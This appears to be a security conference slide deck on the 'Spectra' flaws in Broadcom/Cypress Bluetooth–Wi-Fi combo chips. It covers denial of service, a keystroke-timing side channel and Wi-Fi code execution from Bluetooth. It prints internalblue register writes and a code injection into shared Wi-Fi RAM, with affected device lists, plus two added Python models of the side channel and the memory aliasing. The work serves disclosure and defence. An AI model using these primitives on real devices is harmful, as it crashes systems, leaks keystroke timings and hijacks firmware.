When you got Bluetooth on-chip RCE...


Matthew Green @matthew_d_green:
"Bluetooth, after 22 years of expensive iterative development, is indistinguishable from magic."
4:02 AM - May 24, 2020 - Twitter for iPhone


FRANKENSTEIN
Bluetooth RCE


35C3 Talk: https://media.ccc.de/v/35c3-9498-dissecting_broadcom_bluetooth, Frankenstein Fuzzer: https://github.com/seemoo-lab/frankenstein


...but Wi-Fi has more privileges. 


“But it’s connected via UART!” 


“Can you pop calc?” 
Let's break inter-chip separation!

Spectra: Speculative Spectrum Transmission


Wi-Fi, Bluetooth, and even LTE share frequencies in the 2.4 GHz spectrum.
They cause interference in small devices like smartphones.

Wireless combo chip performance optimization: enhanced coexistence mechanisms.

Observable side effects of transmission delays and coordination lead to side channels.

Attackers require code execution privileges, but they can escalate between
wireless cores without further checks by the operating system.

SPECTRA 


Wireless Architecture (iOS)

Figure: the Bluetooth core (ARM CM3/CM4), the Wi-Fi core (ARM CR4 with the D11 core) and the Intel/Qualcomm baseband.
Solid lines: hardwired serial coexistence interfaces, inter-chip attack surface.
Dashed lines: wireless bottom-up and app-based top-down attack surface.




Spectra Impact 


Denial of Service 


One wireless core denies transmission 
to the other core. 


Information Disclosure 


One wireless core can infer data or 
actions of the other core. 


Code Execution 


One wireless core can execute code 
within the other core. 


Matthew Garrett @mjg59: "QUEER GHOST ATTACK"

(quoting Catalin Cimpanu @campuscodi, May 21: "New 'Spectra' attack breaks the separation between Wi-Fi and Bluetooth communications on the same device", zdnet.com/article/new-sp...)


Broadcom: ~ 1 Billion Devices 


Apple 
o All iPhones, MacBooks, iMacs, older Apple Watches 


Samsung 
o Samsung Galaxy S and Note series in Europe 


Google 


o Only older devices, e.g., Nexus 5/6P 
Raspberry Pi 
IoT devices 

o Fitbit Ionic 


And no firmware checks. A perfect prototyping platform \o/ 


Coexistence: Escalation within the chip

Block diagram from the BCM4339 datasheet (Google Nexus 5), annotated with the Spectra findings:

- Bluetooth side: ARM CM3, RAM/ROM, UART/PCM/I2S host interfaces, BT_HOST_WAKE/BT_DEV_WAKE, JTAG, other GPIOs, DMA, BT RF.
- Wi-Fi side: ARM CR4, RAM/ROM, NIC-301 AXI backplane with AXI2AHB/AXI2APB bridges, chip-common registers, OTP, D11 core (MAC), 1x1 802.11ac PHY, 2.4 GHz/5 GHz 802.11ac dual-band radio, RF switch controls, SDIO 3.0 / PCIe 1.1 host interfaces, WL_HOST_WAKE/WL_DEV_WAKE, JTAG, other GPIOs, 32 kHz external LPO, XTAL.
- RF front end: FEM or SP3T (2.4 GHz), FEM or SPDT (5 GHz), diplexer, CLB.
- SECI UART and GCI GPIOs: external output used in the evaluation board debugging setup.

Annotated attack surfaces:
WLAN RAM sharing (WLAN/BT access): CVE-2020-10368 Information Disclosure, CVE-2020-10367 Code Execution.
GCI Coex I/F: CVE-2019-15063 Denial of Service, CVE-2020-10370 Denial of Service, CVE-2020-10369 Information Disclosure.
BlueRF shared LNA control and other coexistence interfaces.


Product Overview

The Cypress CYW43XXX WLAN, CYW207XX BT, or WLAN/BT combo chips provide the highest level of integration for wearables and other consumer/industrial embedded applications. The device includes integrated PMU, IEEE 802.11 MAC/baseband, radio, and Bluetooth for each combo chip. It supports all rates specified in the IEEE 802.11a/b/g/n/ac specifications. It also supports optional antenna diversity for improved RF performance in difficult environments.

An embedded wireless system-on-a-chip (SoC) CYW43907, which includes an ARM-based processor as well as WLAN, offers the lowest RBOM in the industry and is uniquely suited for Internet-of-Things (IoT) applications.

For the WLAN section, several alternative host interfaces are included: SDIO, SPI, and PCIe depending on the products. For the Bluetooth section, a host interface option using high-speed 4-wire UART and PCM (Pulse-Code Modulation) digital audio are provided.

In an integrated single-chip combo solution, the CYW43XXX implements highly sophisticated enhanced collaborative coexistence hardware mechanisms and algorithms to enable the WLAN and Bluetooth to operate simultaneously and to ensure maximum medium access time, high throughput, and audio quality. Collaborative coexistence between WLAN and Bluetooth is implemented according to IEEE 802.15.2 Packet Traffic Arbitration (PTA) and through Cypress's Enhanced Coexistence Interface (ECI). ECI augments PTA signaling by enabling exchange of additional information required for implementing more advanced collaborative coexistence methods. As a result, overall quality for simultaneous voice, video, and data transmission on an embedded system is achieved.

By the way, throughput really sucks with ECI disabled. You cannot stream a video with Wi-Fi and listen to it with your Bluetooth headset.

www.cypress.com Document No. 002-14852 Rev. *C
AN214852 - Collaborative Coexistence Interface Between Cypress-to-Cypress Solutions and Cypress-to-third-party Chips
Serial Enhanced Coexistence Interface (also SECI, ECI, GCI)

Separate Bluetooth (CYW20719) and Wi-Fi (CYW490307) boards.
Only connection: Serial Enhanced Coexistence Interface (SECI).
Separate antennas, exclude side effects!
Debugging with logic analyzer.


What does it look like?

Logic analyzer captures (figure):
a) SECI while streaming music via Bluetooth and scanning for Wi-Fi access points, t = 3.2 s to 7 s, with markers at scan start, last result and scan end.
b) The same capture zoomed in to the first Wi-Fi peak (t = 3.83632 s to 3.83642 s): the Bluetooth line carries bytes such as "fe db e1 db 3c", the Wi-Fi line "ab 03 db 22".
c) SECI while typing on a Bluetooth keyboard, Wi-Fi inactive, t = 20.52 s to 20.91 s.


Denial of Service BT→Wi-Fi

CVE-2019-15063 (reported August 2019)

When Bluetooth writes to the GCI chipcontrol register at 0x650200, this crashes Wi-Fi.
We can observe a voltage drop with the logic analyzer.
Causes a kernel panic on various devices; Wi-Fi PCIe behaves really strangely afterward...


macOS Kernel Panic Demo

Terminal screenshot: internalblue connected to a MacBook Pro (13-inch, 2019, Two Thunderbolt 3 ports), chip identifier 0x203a (001.000.058), firmware information loaded for BCM4377B3, Wireshark configured on the loopback interface. The Bluetooth-side write that takes Wi-Fi down:

> writemem --hex 0x650400 ff

A ping running next to it shows the round-trip time jumping from around 15-25 ms to 172 ms and 48-50 ms before the machine panics.

Denial of Service BT→Wi-Fi: tested devices

Chip | Device | OS | Firmware build | Register(s) written | Effect
BCM4335C0 | Nexus 5 | Android 6.0.1 | Dec 11 2012 | 0x650440, 0x650600 | Disconnects all Wi-Fi, Wi-Fi can be reconnected.
BCM4345B0 | iPhone 6 | iOS 12.4 | Jul 15 2013 | 0x650000-0x6507ff | Disables only 2.4 GHz Wi-Fi until restarting Bluetooth.
BCM4345C0 | Raspberry Pi 3+/4 | Raspbian Buster | Aug 19 2014 | 0x650000-0x6507ff | Random: full and partial Wi-Fi crashes, including Secure Digital Input Output (SDIO), ability to scan for Wi-Fis, speed reduction. Reboot required to restore functionality.
BCM4358A3 | Nexus 6P | Android 7.1.2 | Oct 23 2014 | 0x650000-0x6507ff | Disables all Wi-Fi until restarting Bluetooth.
BCM4358A3 | Samsung Galaxy S6 | Lineage OS 14.1 | Oct 23 2014 | 0x650000-0x6507ff | Disables all Wi-Fi until restarting Bluetooth.
BCM4345C1 | iPhone SE | iOS 12.4-13.3.1 | Jan 27 2015 | 0x650200 | Kernel panic, resulting in a reboot.
BCM4355C0 | iPhone 7 | iOS 12.4-13.3.1 | Sep 14 2015 | 0x650200 | Kernel panic, resulting in a reboot.
BCM4347B0 | Samsung Galaxy S8 | Android 8.0.0 | Jun 3 2016 | 0x650200 | Disables all Wi-Fi, kernel panic & reboot when re-enabling it.
BCM4347B0 | Samsung Galaxy S8 | LineageOS 16.0 | Jun 3 2016 | 0x650200 | Temporarily disables all Wi-Fi, freezes system for a couple of seconds when re-enabling Wi-Fi.
BCM4347B1 | iPhone 8/X/XR | iOS 12.4-13.3.1 | Oct 11 2016 | 0x650200 | Kernel panic, resulting in a reboot.
CYW490307+CYW20719 | Evaluation boards | ThreadX+Linux | Jan 17 2017 | 0x650200 | SECI voltage drop, only observable with the logic analyzer.
BCM4375B1 | Samsung Galaxy S10/S10e/S10+ | Android 9 | Apr 13 2018 | 0x650200 | Disables all Wi-Fi. Reboot required to re-enable Wi-Fi.
BCM4375B1 | Samsung Galaxy S10/S10e/S10+/S20 | Android 10 | Apr 13 2018 | 0x650200 | Disables Wi-Fi until disabling Bluetooth, going to airplane mode, and re-enabling them.
BCM4377B3 | MacBook Pro/Air 2019-2020 | macOS 10.15.1-10.15.5 | Feb 28 2018 | 0x650400 | System freeze and panic without crash log or with x86 CPU CATERR detected.
BCM4364B3 | MacBook Pro/Air 2019-2020 | macOS 10.15.4-10.15.5 | May 9 2018 | 0x650600 | System freeze and panic without crash log or with x86 CPU CATERR detected.
BCM4378B1 | iPhone 11 | iOS 13.3 | Oct 25 2018 | 0x650400 | Kernel panic in LLC Bus error from cpu1 and reboot.


Wi-Fi D11 Core

Broadcom Wi-Fi Architecture

Quite the same real-time architecture since 2003:

- Initial version: Soft MAC, the Linux host talks directly with the low-level stuff.
- Newer versions: Full MAC, an additional ARM core offloads almost all operations.

Figure, both generations of the Wi-Fi chipset:
Soft MAC: Host ↔ D11 MAC core (D11 PSM CPU, shared memory) ↔ PHY (DSSS PHY / OFDM PHY, baseband, RF) ↔ radio front-end.
Full MAC: Host ↔ Full MAC ARM core ↔ D11 MAC core (D11 PSM CPU, shared memory) ↔ PHY (DSSS PHY / OFDM PHY, baseband, RF) ↔ radio front-end.

Since BCM94303 (2003) and BCM94318E (2006), chipset initially called Airforce One.


D11 Core: A Specialized Microcontroller

Runs ucode; the instruction set is very proprietary, never seen in other architectures:

- 8-byte fixed-length instructions
- three-operand instructions plus very weird bit-oriented operators
- tightly connected to PHY hardware

Example from the main loop:

    jext  EOI(COND_RX_PLCP), rx_plcp        // Preamble (Physical-layer convergence protocol)
    jext  COND_RX_COMPLETE, rx_complete
    jext  EOI(COND_RX_BADPLCP), rx_badplcp
    jnext COND_RX_FIFOFULL, rx_fifofull

Example from the send-response code:

    mov   0x0D4, SPR_TME_VAL6               // ACK indicated by 0xD4
    mov   0x035, TX_TYPE_SUBTYPE
    je    RX_TYPE_SUBTYPE, TS_PSPOLL, pspoll_frame

Existing disassembler/assembler (customized to support later instructions):
Michael Büsch created it back in 2007, updated since then within Nexmon.
Hints about registers come from many pieces of software leaked publicly.

Public ucode tool initially released by Michael Büsch in 2007 (https://bues.ch/cgit/b43-tools.git), continued within Nexmon (https://github.com/seemoo-lab/nexmon).


Inside the D11 Core

Specialized MAC CPU
- Controls Tx and Rx engines
  o channel access scheduling, retransmission
  o filters incoming packets
- Direct access to hardware:
  o PHY registers
  o Radio
  o Interfaces, i.e., coexistence with Bluetooth
- Up to 64 kB ucode memory
- Up to 8 kB own RAM (called Shared Mem)
- Indirect access to host memory/FIFO
- Sub-µs accuracy


...many interfaces, like SECI...

D11 Coexistence Interface (SECI)

Quite a few registers directly accessible from D11:
- a 64-bit buffer for receiving messages from Bluetooth (time indications and message type)
  o messages are 'streamed' from Bluetooth at a high rate (every 1.25 ms)
- programmable timers
- one register btcx_trans_ctrl with two bits for telling Bluetooth
  o who has priority
  o who is controlling the antenna
  o it is a grant/reject interface

D11 ucode (reference 43909B0 from Cypress): 12% of the 47 kB ucode is for coexistence.

Jitter to Bluetooth measured with FPGA (figure, Wi-Fi #2):
- receive a frame, wait until the end
- transmit a SECI message
- approximately 200 ns std


Breaking the Grant/Reject Scheme

Figure: Bluetooth grant and reject counters for ACL packets over time (0 to 280 s) while Bluetooth streams audio. Phases marked: playback started, playback running, Wi-Fi disconnected, playback paused, Wi-Fi caches video while there is still some video buffer for Bluetooth. Legend: "Bluetooth Reject by Wi-Fi" and "Bluetooth Grant".


Denial of Service Wi-Fi→BT

CVE-2020-10370 (reported March 2020)

- When Wi-Fi is active and then stops sending SECI messages, Bluetooth stops transmitting packets.

Figure (t = 2.2 s to 3.6 s): Wi-Fi traffic, then the D11 core counters are paused, the Bluetooth audio pauses, then Wi-Fi continues.


Let's take a closer look!

c) SECI while typing on a Bluetooth keyboard, Wi-Fi inactive (t = 20.52 s to 20.91 s).

Bluetooth keyboard connected, Wi-Fi is idle. Bluetooth sends a message every 30 ms and Wi-Fi is sleeping.
Accurate Key Timings

Figure (t = 30 s to 38 s), three aligned traces: Wireshark keypress events, Wireshark HID data, and the SECI keyboard trace (frame start db 03 db 22, keypress action db 21 db 58, followed by ee ... bytes).

Keypress timings as observed on the logic analyzer when filtering for action db 21 db 58. SECI time resolution is indicated by filtering for the frame start db 03 db 22, which is every 30 ms for the analyzed keyboard. The aligned Wireshark trace is observed on the host and contains the decoded keypresses in addition to the slightly inaccurate timings.


Information Disclosure Side Channel

CVE-2020-10369 (reported March 2020)

Each Bluetooth Human Interface Device (HID) event generates a SECI message.
HID devices exist in different event timing variants; the keyboard under test had
30 ms, but other keyboards have 12.5 ms, 15 ms, etc.

SECI messages are polled every 1.25 ms by the Wi-Fi D11 core.

The SECI message for keep-alive packets is different from the SECI message
containing a HID keystroke.

→ Infer keystroke timings and keypress amounts.
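A worked model of that inference step, added here as an example and not the authors' tooling: it takes a constructed SECI trace of the kind the logic analyzer captures above, classifies messages by the two marker sequences from the captions (db 03 db 22 frame start, db 21 db 58 keystroke action), quantises timestamps to the D11 core's 1.25 ms polling grid, and recovers keystroke count and spacing. Everything about the message layout beyond those four leading bytes, and the trace itself, is an assumption.

```python
"""SECI keystroke side channel (CVE-2020-10369), modelled on the observations above.

Added example, not the authors' tooling. From the page: the Wi-Fi D11 core polls
SECI every 1.25 ms, the tested keyboard reports every 30 ms, a keep-alive frame
starts with db 03 db 22 and a keystroke action with db 21 db 58. Assumed here
(not on the page): that a message is identified purely by those leading bytes,
and the constructed trace below, which stands in for a logic-analyzer export.
"""
import math
from dataclasses import dataclass

KEEPALIVE = bytes.fromhex("db03db22")  # frame start: every 30 ms on the tested keyboard
KEYPRESS = bytes.fromhex("db21db58")   # action sent when a HID key event occurs
D11_POLL_MS = 1.25                     # polling interval of the Wi-Fi D11 core


@dataclass(frozen=True)
class SeciMessage:
    t_ms: float
    kind: str  # "keepalive", "keypress" or "other"


def classify(payload: bytes) -> str:
    """Map a raw SECI message to the classes the side channel needs."""
    if payload.startswith(KEYPRESS):
        return "keypress"
    if payload.startswith(KEEPALIVE):
        return "keepalive"
    return "other"


def parse_trace(trace):
    """trace: iterable of (timestamp_ms, payload) pairs as a logic analyzer exports them."""
    return [SeciMessage(t, classify(p)) for t, p in trace]


def as_seen_by_d11(msgs):
    """The Wi-Fi core only samples SECI every 1.25 ms, so it notices a message at the
    next polling slot, not at the instant it went over the wire."""
    return [SeciMessage(math.ceil(m.t_ms / D11_POLL_MS) * D11_POLL_MS, m.kind) for m in msgs]


def infer_keystrokes(msgs):
    """Count key events and recover the gaps between them (timing, not key identity)."""
    times = [m.t_ms for m in msgs if m.kind == "keypress"]
    gaps = [round(b - a, 3) for a, b in zip(times, times[1:])]
    return len(times), gaps


def report_interval_ms(msgs):
    """Average spacing of the keyboard's frames (keep-alive or keystroke): the HID
    report interval, which bounds how precisely a keystroke can be timed (30 ms here,
    not the 1.25 ms SECI polling resolution)."""
    times = [m.t_ms for m in msgs if m.kind in ("keepalive", "keypress")]
    gaps = [b - a for a, b in zip(times, times[1:])]
    return round(sum(gaps) / len(gaps), 3) if gaps else None


# Constructed trace: a 30 ms keyboard, three key events, one unrelated message.
CONSTRUCTED_TRACE = [
    (0.0, KEEPALIVE + b"\xee\xee\xee"),
    (30.0, KEEPALIVE + b"\xee\xee\xee"),
    (60.0, KEYPRESS + b"\x00\x04"),
    (90.0, KEEPALIVE + b"\xee"),
    (120.0, KEYPRESS + b"\x00\x05"),
    (150.0, KEEPALIVE + b"\xee"),
    (150.4, bytes.fromhex("abcd")),
    (180.0, KEEPALIVE + b"\xee"),
    (210.0, KEYPRESS + b"\x00\x06"),
]


def analyse(trace=CONSTRUCTED_TRACE):
    """Run the whole pipeline from the Wi-Fi core's point of view."""
    msgs = as_seen_by_d11(parse_trace(trace))
    count, gaps = infer_keystrokes(msgs)
    return {"keypresses": count, "gaps_ms": gaps, "report_interval_ms": report_interval_ms(msgs)}


if __name__ == "__main__":
    print(analyse())
```

`analyse()` returns three keypresses with gaps of 60 ms and 90 ms and a 30 ms report interval. The quantisation step is where the 1.25 ms polling shows up (the unrelated 150.4 ms message is seen at 151.25 ms), and the report-interval step is the caveat a practitioner wants: the attacker learns when and how often keys were hit, not which keys, and the timing is only as fine as the peripheral's own HID report interval.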


When you spent too much time looking for side channels...

RAM sharing??! Only one direction?




Where is the shared RAM?

- Bluetooth-only chips with coexistence interface?
  Cypress WICED Studio contains partial symbols for CYW20719, CYW20735, CYW20819 including register mappings, but nothing in there.

- Bluetooth/Wi-Fi combo chips?
  But they also forgot the symbols of one MacBook Pro (2016 model).

wlan buf 4... let's go for this!


Information Disclosure

CVE-2020-10368 (reported March 2020)

- Bluetooth can read information from the Wi-Fi RAM starting at register 0x680000.
  This is mapped to Wi-Fi 0x180000. This range starts with a packet buffer.


Code Execution

CVE-2020-10367 (reported March 2020)

- Bluetooth can write data to the Wi-Fi RAM starting at register 0x680000. This is
  mapped to Wi-Fi 0x180000.

- At 0x181000, Wi-Fi contains a function pointer table.
  We can gain Wi-Fi code execution on a Samsung Galaxy S10 by writing to
  0x681024 in Bluetooth.

CONSOLE: 000288.686 THREADX TRAP INFO:
CONSOLE: 000288.686 Thread: main thread(ID:0x54485244) run cnt:7792
CONSOLE: 000288.686 Thread: Stack:002fff24 Start Addr:002fdff0 End Addr:002fffef Size:8192
CONSOLE: 000288.686 Thread: Entry func:001c556d
CONSOLE: 000288.686 Thread: Timer:0022cfcc
CONSOLE: 000288.686
CONSOLE: FWID 01-a4172c0
CONSOLE: flags 30040007
CONSOLE: 000288.686
CONSOLE: TRAP 3(2ffeb8): pc 67452300, lr 19b569, sp 2fff10, cpsr 68000193, spsr 68000033
CONSOLE: 000288.686 ifsr 0, ifar 67452300
CONSOLE: 000288.686 srpwr: 0x100b0000 clk:0xb0040 pmu:0x13e 0x5fcbc7df 0x0
CONSOLE: 000288.686 r0 2e15a8, r1 2c96a4, r2 2ca298, r3 0, r4 2c9708, r5 19c46f, r6 467ae
CONSOLE: 000288.686 r7 40, r8 28bde0, r9 29224, r10 2fdff0, r11 0, r12 67452300
CONSOLE: 000288.686
CONSOLE: sp+0 00000000 13d75f00 002d3a84 0028bde0
CONSOLE: 000288.686 sp+10 00299b74 00000000 0022d084 0028bde0
CONSOLE: 000288.686 sp+20 0019c46f
CONSOLE: 000288.686 sp+3c 00195355
CONSOLE: 000288.686 sp+54 0019c46f
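To make the aliasing concrete, here is an added example (not Broadcom, Cypress or the authors' code) that models the shared window: Bluetooth 0x680000 maps onto Wi-Fi 0x180000, the function pointer table sits at Wi-Fi 0x181000, and a write to Bluetooth 0x681024 lands on table entry 9, so the next call through that entry takes the Wi-Fi core to the pc the trap above reports. The window size, table length, packet-buffer contents and the pointer value written are constructed; the filtered write models a fix that refuses accesses into the alias.

```python
"""WLAN RAM sharing as seen from the Bluetooth core (CVE-2020-10367/-10368) and an
address filter of the kind the vendor fix amounts to.

Added example, not Broadcom/Cypress code. Taken from the page: Bluetooth address
0x680000 aliases Wi-Fi RAM at 0x180000, a function pointer table lives at Wi-Fi
0x181000, and a write to Bluetooth 0x681024 diverted the Wi-Fi core (the trap
above shows pc 0x67452300). Assumed here: the window size, the table length, the
packet-buffer contents and the pointer values, all constructed for illustration.
"""
import struct

BT_ALIAS_BASE = 0x680000   # where the Bluetooth core sees the Wi-Fi RAM
WLAN_RAM_BASE = 0x180000   # the same bytes in the Wi-Fi core's address space
WINDOW_SIZE = 0x2000       # assumption: length of the alias window
FPTR_TABLE = 0x181000      # Wi-Fi address of the function pointer table
FPTR_ENTRIES = 16          # assumption: number of table entries


class WlanRam:
    """Toy model of the shared RAM window plus what the Wi-Fi firmware does with it."""

    def __init__(self):
        self.mem = bytearray(WINDOW_SIZE)
        self.mem[0:16] = b"packet-buffer!!!"          # assumption: frames land here
        for i in range(FPTR_ENTRIES):                  # assumption: Thumb handler addresses
            self.write32(FPTR_TABLE + 4 * i, 0x001C0001 + 0x40 * i)

    def _off(self, wlan_addr):
        off = wlan_addr - WLAN_RAM_BASE
        if not 0 <= off <= WINDOW_SIZE - 4:
            raise ValueError(f"{wlan_addr:#x} outside the modelled window")
        return off

    def read(self, wlan_addr, n):
        off = self._off(wlan_addr)
        return bytes(self.mem[off:off + n])

    def read32(self, wlan_addr):
        return struct.unpack_from("<I", self.mem, self._off(wlan_addr))[0]

    def write32(self, wlan_addr, value):
        struct.pack_into("<I", self.mem, self._off(wlan_addr), value)

    def dispatch(self, index):
        """The Wi-Fi firmware calls table entry `index`; return the pc the ARM CR4
        ends up at (Thumb bit cleared), which is what a trap dump reports."""
        return self.read32(FPTR_TABLE + 4 * index) & ~1


def bt_to_wlan(bt_addr):
    """Translate an address in the Bluetooth alias into the Wi-Fi address space."""
    off = bt_addr - BT_ALIAS_BASE
    if not 0 <= off < WINDOW_SIZE:
        raise ValueError(f"{bt_addr:#x} is not inside the WLAN RAM alias")
    return WLAN_RAM_BASE + off


# Unfiltered behaviour: the backplane forwards Bluetooth accesses into Wi-Fi RAM.
def bt_read_unfiltered(ram, bt_addr, n=4):
    return ram.read(bt_to_wlan(bt_addr), n)


def bt_write32_unfiltered(ram, bt_addr, value):
    ram.write32(bt_to_wlan(bt_addr), value)


def bt_write32_filtered(ram, bt_addr, value):
    """Fix in the spirit of 'disallow memory access': drop any write that would land
    in the Wi-Fi RAM alias, forward everything else. Returns whether it was forwarded."""
    if 0 <= bt_addr - BT_ALIAS_BASE < WINDOW_SIZE:
        return False
    bt_write32_unfiltered(ram, bt_addr, value)  # raises: only the alias is modelled
    return True


def demo():
    """Reproduce the page's two effects against the model and return the evidence."""
    ram = WlanRam()
    leaked = bt_read_unfiltered(ram, BT_ALIAS_BASE, 16)      # CVE-2020-10368
    index = (bt_to_wlan(0x681024) - FPTR_TABLE) // 4         # which handler gets clobbered
    bt_write32_unfiltered(ram, 0x681024, 0x67452301)          # CVE-2020-10367 (value assumed)
    return leaked, index, ram.dispatch(index)


if __name__ == "__main__":
    leaked, index, pc = demo()
    print(f"leaked {leaked!r}; table entry {index} now sends the CR4 to pc={pc:#x}")
```

`demo()` returns the leaked packet-buffer bytes, the clobbered table index (9) and the resulting pc (0x67452300). Where such a filter lives matters: a check in the Bluetooth firmware's command handler stops writes that arrive over HCI, the path the demos on this page use, but the talk's starting point is an attacker who already runs code on a wireless core, and a check performed by the same firmware that attacker controls is no barrier unless the bus itself enforces the window.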


MBP 2019/2020 (BCM4377)

Terminal screenshot: internalblue on the MacBook Pro (chip identifier 0x203a, firmware information loaded for BCM4377B3), next to `watch ls` on the Wi-Fi CoreCapture log directory, which is filling up with "BCMWLAN Net Roam Failure-status=3,reason=4" entries. The Bluetooth-side write into the Wi-Fi RAM alias:

> writeasm 0x68cbfc b 0xda123456
[*] Assembler was successful. Machine code (len = 20 bytes) is:
[*] 0068cbfc  00 f0 00 b8 78 47 fd e7 04 f0 1f e5 56 34 12 da
[*] 0068cc0c  00 00 00 00
[?] Warning: Address 0x0068cbfc (len=0x14) is not inside a RAM section. Continue? [yes/no]


CVE-2020-10367 and -10368: A few devices...

Chip | Device | OS | Firmware build
BCM4335C0 | Nexus 5 | Android 6.0.1 | Dec 11 2012
BCM4345B0 | iPhone 6 | iOS 12.4 | Jul 15 2013
BCM43430A1 | Raspberry Pi 3 | Raspbian Buster | Jun 2 2014
BCM4345C0 | Raspberry Pi 3+/4 | Raspbian Buster | Aug 19 2014
BCM4358A3 | Samsung Galaxy S6, Google Nexus 6P | Lineage OS 14.1 | Oct 23 2014
BCM20703A2 | MacBook Pro 2016 | - | Oct 22 2015
BCM4355C0 | iPhone 7 | iOS 13.3 | Sep 14 2015
BCM4347B0 | Samsung Galaxy S8 | Android 8.0.0 | Jun 3 2016
BCM4347B1 | iPhone 8/X/XR | iOS 13.3 | Oct 11 2016
BCM4375B1 | Samsung Galaxy S10/S10e/S10+ | Android 9 | Apr 13 2018
BCM4375B1 | Samsung Galaxy S10/S10e/S10+/S20 | Android 10 | Apr 13 2018
BCM4377B3 | MacBook Pro+Air, 2019-2020 | macOS Catalina 10.15.1-10.15.5 | Feb 28 2018
BCM4364B3 | MacBook Pro+Air, 2019-2020 | macOS Catalina 10.15.4-10.15.5 | May 9 2018
BCM4378B1 | iPhone 11 | iOS 13.3 | Oct 25 2018

Legend of the per-row status markers:
? Mentioned in datasheet but probably different mapping, did not crash in our test.
• Likely vulnerable but no physical device available for testing.
* Kernel panic observed on the operating system.


When you have no idea what you're doing...

Terminal screenshot: `watch ls` on /Library/Logs/CrashReporter/CoreCapture/WiFi (MacBook-Pro.local, Mon Jul 6 17:33:31 2020) while writing into the Wi-Fi RAM alias from Bluetooth. Every poke leaves a watchdog capture; representative entries:

[2020-07-06_13,17,29.925442]=watchdog@BCMWLAN Chip Trap-Type=4,PC=0x56EC6,LR=0x56EB7
[2020-07-06_13,17,46.927561]=watchdog@BCMWLAN Chip Trap-Type=4,PC=0x16DB7F,LR=0x16E093
[2020-07-06_13,18,07.548388]=watchdog@BCMWLAN Chip Trap-Type=4,PC=0x16DB7F,LR=0x16DB95
[2020-07-06_13,18,25.291703]=watchdog@BCMWLAN Chip Trap-Type=4,PC=0x8CB2,LR=0x1B2C1D
...
[2020-07-06_16,53,04.368957]=watchdog@BCMWLAN Chip Trap-Type=4,PC=0x39100,LR=0x38BE1
[2020-07-06_16,53,18.384791]=watchdog@BCMWLAN Chip Trap-Type=4,PC=0x16B104,LR=0x16B0E5
[2020-07-06_16,53,33.230057]=watchdog@BCMWLAN Chip Trap-Type=4,PC=0x16DB7F,LR=0x16E093
[2020-07-06_16,53,50.442298]=watchdog@BCMWLAN Chip Trap-Type=4,PC=0x16DB7F,LR=0x16E093

Besides the frequent Trap-Type=4 (most often at PC=0x16DB7F, LR=0x16E093), the log also shows Trap-Type=3 (PC=0xFECABEB8, LR=0x18A46B) and Trap-Type=7 (PC=0xB9C9E, LR=0xBA349) chip traps, Cmdr entries reporting "Pending Queue Stall-cmd-WLC_SET_VAR: event_msgs_ext" and "Outbound Queue Stall-cmd-WLC_GET_VAR: ver", plus "Core Wake Reason Unexpected-Failed to get cached FW wakeup data", "Bus Unexpected Phase Bit-phase=0,expect=1,r=249,w=0" and "Failed to Create Debug Ring".


4— 


Code Execution


Wi-Fi code execution leads to various kernel panics 


Kernel panics captured so far: 


e Samsung Galaxy S10e on Android 9 
e iPhone 8 on ¡OS 13.3, iPhone 6 on iOS 12.4 
e ... also macOS but likely another issue in the Bluetooth driver. 


MOST STUPID FUZZER


iOS Kernel Panic Demo

Screenshot of the iPhone Settings app (Airplane Mode, Wi-Fi and Bluetooth toggles) right before the panic.


The "Patch"

Handwritten annotations on the slide (partly illegible): filter the HCI command, disallow the memory access, after driver initialization.

Wireless architecture figure, repeated: Bluetooth (ARM CM3/CM4), Intel/Qualcomm baseband, Wi-Fi (ARM CR4 with the D11 core).
Solid lines: hardwired serial coexistence interfaces, inter-chip attack surface.
Dashed lines: wireless bottom-up and app-based top-down attack surface.


Mobile Wireless Standards: Bluetooth/LTE Coexistence

BLUETOOTH CORE SPECIFICATION Version 5.2 | Vol 7, Part C, page 3255
Wireless Coexistence Interface 2 (WCI-2) Transport Specification

3.1.4 MWS Inactivity Duration message (Type 3)

The MWS Inactivity Duration message is used to send the MWS_INACTIVITY_DURATION signal from the MWS device to the Bluetooth Controller.

The message is sent at the beginning of the MWS inactivity period.

DURATION[0] | DURATION[1] | DURATION[2] | DURATION[3] | DURATION[4]

Table 3.10: MWS Inactivity Duration message


Everyone has proprietary coexistence features \o/ 


Asked Broadcom if we can also include other wireless manufacturers into the 
responsible disclosure process. 


Yes, we can :) 


Forwarded to Intel, MediaTek, Qualcomm, Texas Instruments, Marvell, NXP. 
They all mention similar coexistence interfaces in their datasheets. 


Some wireless chips do not separate wireless cores at all. 
— Not directly vulnerable to Spectra? 
Operating system based side channels might exist... 


Summary slide, handwritten and mostly illegible: Wi-Fi kernel panic, Wi-Fi information disclosure, Bluetooth DoS.
Twitter: @naehrdine, @seemoolab

jiska@bluetooth.lol, francesco.gringoli@unibs.it


